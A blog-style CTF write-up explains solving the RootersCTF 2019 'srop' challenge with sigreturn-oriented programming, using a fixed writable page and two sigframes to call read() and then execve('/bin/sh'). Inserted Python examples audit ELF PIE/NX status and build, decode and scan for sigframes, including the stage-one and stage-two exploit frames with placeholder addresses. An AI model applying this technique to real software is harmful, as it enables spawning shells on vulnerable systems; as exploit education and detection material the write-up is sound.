
Sigreturn Oriented Programming -part 2- challenge (;´༎ຶД༎ຶ`) (day 81)


In the previous post we took a look at a new approach that lets us use ROP without spending too much time picking the necessary gadgets: sigreturn oriented programming. In that example, however, we purposely leaked the stack address to help us call the mprotect function.

What if there is no leaked address? Can we still bypass NX and ASLR at the same time using sigreturn?

Of course you can!

To prove it, let's try to solve the pwn challenge srop from Rooters CTF. The binary can be downloaded from this link: https://github.com/abs0lut3pwn4g3/RootersCTF2019-challenges/tree/master/pwn/srop



Hmmm, it seems we got a stripped binary. This means the function symbols have been stripped, which makes the assembly harder for us to understand.



When we run the program, it only shows a prompt and expects an input; after we enter some value, it doesn't give us anything back.

Let's load the binary into Ghidra. With a stripped binary, the first thing you need to do is find the entry() function, since it contains the location of the main function.

 

From the result we can see that the entry function calls "FUN_00401000()". Don't worry about the name, since Ghidra generated it; all you need to know is that this is actually the main function.

 

Following the function, we can see that it contains two syscalls. Let's run it in gdb to deduce what these two syscalls do, placing a breakpoint before each syscall.


When we hit a breakpoint, take a look at the register values that act as the syscall parameters.


We can see that the register values passed to the syscall match the prompt that was given to us earlier, so we can conclude that the first syscall acts as printf, whereas the second syscall acts as scanf() to take our input.

Let's try to crash the program by entering a long string.





Cool, so we know that we need to provide 136 bytes to take control of the program's instruction pointer. OK, so what is the strategy? We don't have any information leak that we could use to determine the stack address and put our shellcode there. Remember the limitation of ASLR?

ASLR only randomizes the stack, the heap, and the dynamic libraries. So all we need to do is find another memory section within the program that is not randomized, and use this area to store and execute our shellcode.

But where is this location you're talking about?



You can list it using vmmap. Notice the first three entries in the result: these are the locations that ASLR does not randomize.
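As an added illustration of this point (this is not code from the original post), the following Python script reads an ELF64 file's program headers, the same mapping information vmmap shows, and reports whether the binary is PIE, whether the stack is NX, and which writable segments sit at fixed addresses. The embedded sample image is constructed to mirror the three fixed mappings described here, with an rw- page at 0x402000; the r-- and r-x permissions of the first two pages and the sample's entry address are assumptions, not values taken from the challenge.

```python
import struct

# ELF64 constants from the System V ABI (not from the post).
ELF_MAGIC = b"\x7fELF"
ET_EXEC, ET_DYN = 2, 3                      # fixed-address executable / PIE (or shared object)
PT_LOAD, PT_GNU_STACK = 1, 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4

EHDR = struct.Struct("<16sHHIQQQIHHHHHH")   # 64-byte ELF header, little-endian
PHDR = struct.Struct("<IIQQQQQQ")           # 56-byte program header entry


def parse_program_headers(data):
    """Return (e_type, [segment dicts]) for a little-endian ELF64 image."""
    if data[:4] != ELF_MAGIC or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    fields = EHDR.unpack_from(data, 0)
    e_type, e_phoff, e_phentsize, e_phnum = fields[1], fields[5], fields[9], fields[10]
    segments = []
    for i in range(e_phnum):
        p_type, p_flags, _, p_vaddr, _, _, p_memsz, _ = PHDR.unpack_from(data, e_phoff + i * e_phentsize)
        segments.append({"type": p_type, "flags": p_flags, "vaddr": p_vaddr, "memsz": p_memsz})
    return e_type, segments


def flags_to_str(flags):
    """Render p_flags the way vmmap does, e.g. 'rw-'."""
    return "".join(ch if flags & bit else "-" for ch, bit in (("r", PF_R), ("w", PF_W), ("x", PF_X)))


def audit_elf(data):
    """Summarize what ASLR can and cannot hide for this binary."""
    e_type, segments = parse_program_headers(data)
    pie = e_type == ET_DYN
    stack_headers = [s for s in segments if s["type"] == PT_GNU_STACK]
    # A missing PT_GNU_STACK is treated as an executable stack (the conservative reading).
    nx = bool(stack_headers) and not (stack_headers[0]["flags"] & PF_X)
    fixed_writable = []
    if not pie:  # without PIE every PT_LOAD segment lands at its p_vaddr on every run
        for s in segments:
            if s["type"] == PT_LOAD and s["flags"] & PF_W:
                fixed_writable.append((s["vaddr"], s["vaddr"] + s["memsz"], flags_to_str(s["flags"])))
    return {"pie": pie, "nx": nx, "fixed_writable": fixed_writable}


def build_sample_elf(e_type, segments):
    """Constructed sample image: ELF header plus program headers only (no code or data)."""
    ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\0" * 8        # ELFCLASS64, ELFDATA2LSB, EV_CURRENT
    ehdr = EHDR.pack(ident, e_type, 0x3E, 1, 0x401000, EHDR.size, 0, 0,
                     EHDR.size, PHDR.size, len(segments), 0, 0, 0)
    phdrs = b"".join(PHDR.pack(t, f, 0, va, va, sz, sz, 0x1000) for t, f, va, sz in segments)
    return ehdr + phdrs


# Assumed layout mirroring the post's vmmap: r-- at 0x400000, r-x at 0x401000,
# rw- at 0x402000, and a non-executable stack.
SAMPLE_SEGMENTS = [
    (PT_LOAD, PF_R, 0x400000, 0x1000),
    (PT_LOAD, PF_R | PF_X, 0x401000, 0x1000),
    (PT_LOAD, PF_R | PF_W, 0x402000, 0x1000),
    (PT_GNU_STACK, PF_R | PF_W, 0, 0),
]

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_elf(ET_EXEC, SAMPLE_SEGMENTS)
    report = audit_elf(data)
    print("PIE:", report["pie"], " NX stack:", report["nx"])
    for start, end, perm in report["fixed_writable"]:
        print(f"  fixed writable segment {start:#x}-{end:#x} ({perm})")
```

Run it with a path to any ELF64 binary to get the same verdict for a real file. The point of the check is the combination: NX alone does not help when the binary is not PIE, because a writable segment at a known address remains available to anything that can redirect execution, which is exactly the gap the rest of this post relies on. Building with `-fPIE -pie` makes the `fixed_writable` list empty.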

We can use two sigframes. The first one stores the "/bin/sh" string in the third entry at 0x00402000 (we store the string there because the permissions allow it to be written). Once that is done, we create another sigframe that calls execve with the location of the "/bin/sh" we just stored in the first sigframe as its parameter.

It sounds complicated, but let's write the code first so you can understand it.


This is the first sigframe. Notice that we set it to execute the read() syscall, and the location we want to store to is 0x402040. You can choose any location as long as it is within the range 0x00402000 - 0x00403000. I chose this location because the first few bytes at the beginning of the region are used to store initialized variables (.data), so I think the safest place is beyond what is listed in the result below.



rsp and rbp are set to make sure there is enough room to store our input.



When we save the payload and run it against the binary, we can see that we managed to emulate the stack and call the read function.

Next, all we have to do is store the "/bin/sh\x00" string at that location and build the second sigframe so that we can call execve and have it execute "/bin/sh".



To call execve through a syscall we need to set the rax register to 59, and the first parameter (rdi) needs to point to the command that we want to execute.
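To make the two frames from the read() step above and this execve step concrete, here is an added Python example (it is not the post's pwntools script) that lays out the x86-64 ucontext the kernel restores on rt_sigreturn, decodes a frame back into the register values it would load, and scans a captured input for frames whose rip points at a known syscall gadget. The gadget address, the rsp value, and the read length are placeholders rather than the challenge's real values; 136 is the offset found earlier, and 0x402040 and 59 are the values this post uses.

```python
import struct

# Slot order of the x86-64 `struct ucontext` that rt_sigreturn reads back from the
# stack: uc_flags, uc_link, uc_stack (3 slots), then `struct sigcontext`. Every slot
# is 8 bytes, so the whole frame is 248 bytes. Layout taken from the Linux kernel ABI.
FRAME_SLOTS = [
    "uc_flags", "uc_link", "ss_sp", "ss_flags", "ss_size",
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip",
    "eflags", "csgsfs", "err", "trapno", "oldmask", "cr2", "fpstate", "reserved", "sigmask",
]
OFFSET = {name: 8 * i for i, name in enumerate(FRAME_SLOTS)}
FRAME_SIZE = 8 * len(FRAME_SLOTS)          # 248
USER_CS = 0x33                             # 64-bit user code segment selector (low 16 bits of csgsfs)
SYSCALL_NAMES = {0: "read", 1: "write", 10: "mprotect", 15: "rt_sigreturn", 59: "execve"}

# Placeholder address; the challenge's real gadget addresses are not reproduced here.
SYSCALL_GADGET = 0x4010A0


def build_frame(**regs):
    """Constructed sample frame: the given registers set, csgsfs = USER_CS, everything else 0."""
    frame = bytearray(FRAME_SIZE)
    struct.pack_into("<Q", frame, OFFSET["csgsfs"], USER_CS)
    for name, value in regs.items():
        struct.pack_into("<Q", frame, OFFSET[name], value)
    return bytes(frame)


def decode_frame(blob):
    """Map every slot of a 248-byte frame to the value the kernel would restore."""
    if len(blob) < FRAME_SIZE:
        raise ValueError(f"frame needs {FRAME_SIZE} bytes, got {len(blob)}")
    return {name: struct.unpack_from("<Q", blob, off)[0] for name, off in OFFSET.items()}


def describe_frame(blob):
    """Explain what a frame does once restored: the syscall rax selects and its first three args."""
    regs = decode_frame(blob)
    return {
        "syscall": SYSCALL_NAMES.get(regs["rax"], f"nr {regs['rax']}"),
        "args": (regs["rdi"], regs["rsi"], regs["rdx"]),
        "rip": regs["rip"],
        "rsp": regs["rsp"],
    }


def find_frames(data, syscall_gadgets, step=8):
    """Heuristic scan of a captured input or memory dump for SROP-style frames:
    a user-mode CS selector, rip on a known syscall gadget, and a plausible syscall number."""
    hits = []
    for off in range(0, len(data) - FRAME_SIZE + 1, step):
        regs = decode_frame(data[off:off + FRAME_SIZE])
        if (regs["csgsfs"] & 0xFFFF) == USER_CS and regs["rip"] in syscall_gadgets and regs["rax"] < 512:
            hits.append(off)
    return hits


if __name__ == "__main__":
    # Stage 1 of the post: read(0, 0x402040, n), with rsp moved into the rw- page (values assumed).
    stage1 = build_frame(rax=0, rdi=0, rsi=0x402040, rdx=0x100, rip=SYSCALL_GADGET, rsp=0x402700)
    # Stage 2: execve("/bin/sh" stored at 0x402040, NULL, NULL).
    stage2 = build_frame(rax=59, rdi=0x402040, rsi=0, rdx=0, rip=SYSCALL_GADGET)
    for frame in (stage1, stage2):
        print(describe_frame(frame))
    # Constructed capture of the first input: 136 bytes of padding, a return address, then the frame.
    captured = b"A" * 136 + struct.pack("<Q", SYSCALL_GADGET) + stage1
    print("frames found at offsets:", find_frames(captured, {SYSCALL_GADGET}))
```

Decoding a frame this way shows exactly why no leak is needed: every value the kernel restores, including rsp and rip, comes from the attacker-controlled bytes, and the only addresses in them are the fixed 0x402000 page and a gadget in the non-PIE text segment. The same `find_frames` check, fed the program's stdin capture or a core dump together with the addresses of the binary's `syscall` instructions, is a cheap way to triage a crash for this technique.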



Run the exploit and we get a shell, really cool!

That's all for today, I hope you enjoyed this post.

References:
https://syedfarazabrar.com/2019-10-12-rooters-ctf-pwn-challenges/#baby-pwn
